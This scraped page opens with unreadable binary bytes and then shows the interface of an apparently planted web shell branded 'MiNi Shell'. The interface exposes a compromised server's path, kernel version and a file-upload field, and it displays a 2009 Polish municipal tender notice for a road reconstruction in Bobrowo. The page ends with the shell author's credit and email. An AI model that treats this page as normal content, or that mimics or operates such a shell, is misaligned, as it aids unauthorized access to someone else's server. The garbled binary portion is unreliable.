JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/85158-N-2009.html

<p class="kh_header"><b>Bobrowo: Przebudowa drogi z wzmocnieniem konstrukcji i nadbudową nawierzchni asfaltowej jezdni oraz odbudowa odwodnienia w obrębie pasa drogowego drogi gminnej w ciągu Kruszyny - Zgniłobłoty</b><br>
<b>Numer ogłoszenia: 85158 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , 27, 87-327 Bobrowo, woj. kujawsko-pomorskie, tel. 056 495-18-24, faks 056 495-18-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobrowo.samorzad.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi z wzmocnieniem konstrukcji i nadbudową nawierzchni asfaltowej jezdni oraz odbudowa odwodnienia w obrębie pasa drogowego drogi gminnej w ciągu Kruszyny - Zgniłobłoty.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi gminnej nr 080405C Kruszyny - Zgniłobłoty na odcinku o długości 4,3745 km, w km 0+750-5+124,5, dz. nr 192 o/Kruszyny i dz. nr 92/4 o/Zgniłobłoty
1. Zakres zamówienia.
Budowa obejmuje wykonanie zakresu robót:
- roboty przygotowawcze i ziemne
- przebudowa nawierzchni jezdni,
- roboty wykończeniowe,
Droga modernizowana będzie w miejscowościach Kruszyny i Zgniłobłoty 
Szczegółowy opis zakresu robót oraz technologia ich wykonania określone zostały w 
załączonych do SIWZ opisach technicznych, przedmiarach robót, projekcie budowlanym oraz szczegółowej specyfikacji technicznej.

1.1. Zakres prac oraz odpowiedzialności Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także:
a)  roboty wykonać zgodnie z projektem budowlanym,
b)  zapewnić obsługę geodezyjną inwestycji a po zakończeniu robót wykonać inwentaryzację 
     geodezyjną powykonawczą,
c) zorganizować i przeprowadzić niezbędne próby, badania i odbiór oraz ewentualnie uzupełnić 
    dokumentację odbiorczą dla zakresu robót objętych przedmiotem przetargu.         
1.2. Wymagania jakościowe i materiałowe.
a)  do wykonania zamówienia wykonawcy zobowiązani są użyć materiałów i urządzeń w I 
     gatunku, zakupionych u renomowanych producentów, gwarantujących najwyższą jakość, o  
     parametrach technicznych i jakościowych nie gorszych niż określone w szczegółowej   
     specyfikacji technicznej i przedmiarze robót,
b)  występujące w dokumentacji i przedmiarach nazwy, typy i pochodzenie produktów nie są 
     dla wykonawców wiążące ale winni oni uwzględnić możliwość zapewnienia jednolitej 
     obsługi technicznej zamontowanych już urządzeń u zamawiającego,
c)  zamawiający dopuszcza składanie ofert z użyciem urządzeń równoważnych do urządzeń 
     określonych w dokumentacji projektowej, pod warunkiem, że ich parametry będą 
     odpowiadały parametrom określonym w dokumentacji projektowej,
d)  wykonawca składający ofertę na urządzenia równoważne będzie obowiązany do 
     zapewnienia i udokumentowania ich równoważności,
e)  zabrania się stosowania materiałów nie odpowiadających wymaganiom Polskiej Normy 
     oraz innym określonym w projekcie, wykonawca ma obowiązek posiadać w stosunku do 
     użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na ich 
     zastosowanie/wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości),
f)  wykonawca zapewni, aby tymczasowo składowane materiały, do czasu gdy będą one 
     potrzebne do robót, były zabezpieczone przed zniszczeniem, zachowały swoją jakość i 
     właściwości oraz były dostępne do kontroli przez Inspektora Nadzoru ( sprawujący nadzór 
     inżynierski),
2.  Dostępność dokumentacji projektowej.
a)  oryginał projektu dokumentacji budowlanej jest dostępny w siedzibie zamawiającego,
b)  dokumentację projektową udostępni Grzegorz Puścian w siedzibie Urzędu Gminy w dniach 
      roboczych w godzinach 7:15 - 15:00 pokój nr 14,      
c)  wykonawca zobowiązuje się zdobyć informacje konieczne do właściwego wykonania 
     zamówienia w tym zapoznać się z przyszłym placem budowy,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca winien wnieść wadium w wysokości 30.000,00 zł (słownie: trzydzieści tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy:
1)  są uprawnieni do występowania w obrocie prawny zgodnie z wymaganiami ustawowymi,   
2)  wykonawcy składający ofertę wspólną przedstawią do oferty umowę o solidarnej  
     odpowiedzialności oraz o wyznaczeniu spośród siebie strony wiodącej tj. Lidera, który 
     będzie reprezentował związane konsorcjum przed zamawiającym, 
3)  posiadają niezbędne uprawnienia lub kwalifikacje do wykonywania zamówienia, w tym 
     względzie:
     a) kierownik budowy i kierownicy robót - uprawnienia w specjalności dróg i  
          co najmniej 5 letnie doświadczenie w kierowaniu robotami o zakresie objętym 
          zamówieniem odpowiadające wymaganiom określonym w art. 12 ust.7 ustawy z dnia 7 
          lipca 1994r. Prawo budowlane (jednolity tekst Dz.U. z 2003r. Nr 207, poz. 216 z 
          późn.zm.),
     b)  kadra kierowania robotami (kierownik budowy, kierownicy robót) musi być wpisana na  
           listę Okręgowej Izby Inżynierów Budownictwa (Dz.U. z 2001r. Nr 5, poz. 42 z 
          późn.zm.). 
4)  posiadają niezbędną wiedzę, doświadczenie oraz potencjał techniczny gwarantujący 
      wykonanie zamówienia, dysponują pracownikami zdolnymi do wykonania zadania, w tym 
      względzie:
         - wykonali w okresie ostatnich 5 lat minimum 2 roboty drogowe - budowa nawierzchni z       
            mieszanek bitumicznych każda o wartości nie mniejszej niż 2.000.000,00 PLN,    	potwierdzone dokumentami lub referencjami określającymi ich należyte wykonanie.    
5)   po zakończeniu robót uporządkują teren, sporządzą geodezyjną dokumentację 
      powykonawczą i przygotują niezbędne dokumenty w celu uzyskania odbioru końcowego  
      robót,
6)   nie podlegają wykluczeniu w rozumieniu art. 24 ust.1 pkt 1-8 oraz art. 24 ust.2 pkt 2-4, a 
      dodatkowo z art. 24 ust.1 pkt 9 ustawy Prawo zamówień publicznych, 
7) udzielą gwarancji jakości za wykonanie roboty i zamontowanie urządzenia na okres 48 
      miesięcy (4 lata) licząc od dnia protokołu końcowego,
8) ubezpiecza budowę od odpowiedzialności cywilnej, 
9) zamówienie wykonają w terminie do dnia 30 sierpnia 2009r..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający oceni spełnienie warunków wymienionych w rozdziale V niniejszej SIWZ na podstawie złożonych do oferty oświadczeń i dokumentów.
Oceny spełniania warunków dokona komisja przetargowa powołana do oceny ofert.
Ocena spełnienia warunków będzie dokonana na zasadzie: spełnia/ nie spełnia. 
Wykonawca, który nie udokumentuje spełnienia wymienionych wymagań zostanie wykluczony z postępowania, a jego oferta odrzucona.
Na potwierdzenie spełnienia warunków zawartych w rozdziale V, zamawiający wymaga złożenia do oferty następujących oświadczeń i dokumentów:

- Dokumenty oferty należy ułożyć wg kolejności
1. Ofertę na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym  
    załącznik  Nr 1. 
2. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji 
    działalności gospodarczej upoważniające do występowania w obrocie prawnym,  
    wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   Zaświadczenie o wpisie do ewidencji działalności gospodarczej  musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie j.w. 
Dodatkowo
1)	- spółki cywilne i spółki jawne - umowa spółki, 
2)	- umowa regulująca współpracę podmiotów występujących wspólnie (np. konsorcja- 
         umowa o konsorcjum na zadanie objęte zamówieniem) zawierająca:
                - zapis o solidarnej odpowiedzialności,
                - czas  trwania umowy (wymaga się, aby czas trwania umowy nie był krótszy  
                   niż okres realizacje zamówienia oraz okres gwarancji),
                - podmiot wiodący - lidera,
                - podział odpowiedzialności członków konsorcjum,
                - nazwę zamawiającego,
                - przedmiot zamówienia, 
3. Oświadczenia:
    a) o okresie gwarancji jakości na zamontowane urządzenia i wykonane roboty - 48 
        miesięcy, licząc od dnia przekazania obiektu do użytkowania, 
    b) o ubezpieczeniu budowy od odpowiedzialności cywilnej, 
    c) o uporządkowaniu terenu po zakończeniu robót,
    d) o sporządzeniu geodezyjnej dokumentacji powykonawczej,
    e) o wykonaniu wszystkich niezbędnych czynności i uzyskaniu dokumentów w celu  
        uzyskania odbioru końcowego,  
   f) o dokonaniu wizji lokalnej na terenie robót objętych zamówieniem, 
Uwaga:
W/w oświadczenia należy złożyć na jednej kartce w kolejności jak w pkt. 3 
4. Zaświadczenia o nie zaleganiu, zwolnieniu, odroczeniu (lub rozłożeniu na raty zaległych 
    płatności) płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne 
    wystawione przez właściwy terenowo Urząd Skarbowy i Zakład Ubezpieczeń Społecznych - 
    wystawione nie wcześniej niż 3 miesiące licząc od daty wystawienia do dnia składania ofert. 
5. Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 
    ustawy Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy licząc od 
    daty wystawienia do dnia składania ofert. 
6. Informację z Krajowego Rejestru Karnego dla podmiotów zbiorowych  w zakresie 
    określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych - wystawione 
    nie wcześniej niż 6 miesięcy licząc od daty wystawienia do dnia składania ofert. 
7. Opinie inwestorów, użytkowników obiektów potwierdzających, że roboty zostały wykonane  
    z należytą starannością, które wymieniono w wykazie - zał. Nr 4.     
8. Wypełnione następujące załączniki:
     Nr 2 - oświadczenie w trybie art. 24 ustawy Prawo zamówień publicznych,
     Nr 3 - oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych,
     Nr 4 - wykaz zrealizowania robót,
9. Polisę ubezpieczeniową wykonawcy potwierdzająca ubezpieczenie od OC w zakresie 
      prowadzonej działalności gospodarczej. 
10. Kopię dowodu wniesienia wadium.   
11. Wykaz kadry kierowniczej wraz z niezbędnymi uprawnieniami oraz kopie wpisu na OIIB. 
12. Wykaz podwykonawców wraz z przewidzianym dla nich zakresem robót - wg wzoru 
      stanowiącego załącznik Nr 5. 
13. Harmonogram realizacji projektu opracowany na okres  wykonania robót, który należy  
     sporządzić wg załączonego wzoru załącznik nr 6. 

14.  Podpisany wzór umowy stanowiący załącznik Nr 7
 
17. Cena ofertowa (kosztorys ofertowy) - opracowania na podstawie dokumentacji  
      projektowej i dokonanej wizji lokalnej, załączonych nakładów rzeczowych (przedmiarów 
      robót, kosztorysów ślepych wskazujących zakres robót). 
      Cena ofertowa (kosztorys ofertowy)- stanowić będzie podstawę do ceny ofert. 
18. Każda z firm wspólnie składających ofertę (konsorcjum) oraz Podwykonawcy złożą 
      następujące dokumenty:
1)	zaświadczenia uprawniające do występowania w obrocie prawnym,
2)	załącznik Nr 2,3,4,5,6,7,
3)	informacje z KRK zgodnie z pkt. 5 i 6 niniejszego rozdziału.
4)	zaświadczenie o nie zaleganiu z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne (US, ZUS),
5)	polisę ubezpieczeniową wykonawcy potwierdzająca ubezpieczenie od OC w zakresie prowadzonej działalności gospodarczej.
Ważność dokumentów- j.w.
W przypadku składania oferty wspólnej (konsorcjum) oferta, kosztorysy ofertowe, a także wzór umowy muszą być podpisane przez wszystkie podmioty lub podmiot o ile taka reprezentacja wynika z umowy.    

Kopie dokumentów muszą być potwierdzone  za zgodnością z oryginałem przez  wykonawcę lub osobę posiadającą odpowiednie pełnomocnictwo. 
 
Brak któregokolwiek z załączników wymienionych spowoduje odrzucenie oferty, chyba że brak przedmiotowych dokumentów spowodowałyby unieważnienie postępowania, w takiej sytuacji Zamawiający zgodnie z art. 26 ust 3 ustawy wezwie oferentów do uzupełnienia w określonym terminie tych dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bobrowo.bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, 87-327 Bobrowo, pok. nr 14..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:00, miejsce: Urząd Gminy w Bobrowie, sekretariat - pok. nr 12..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com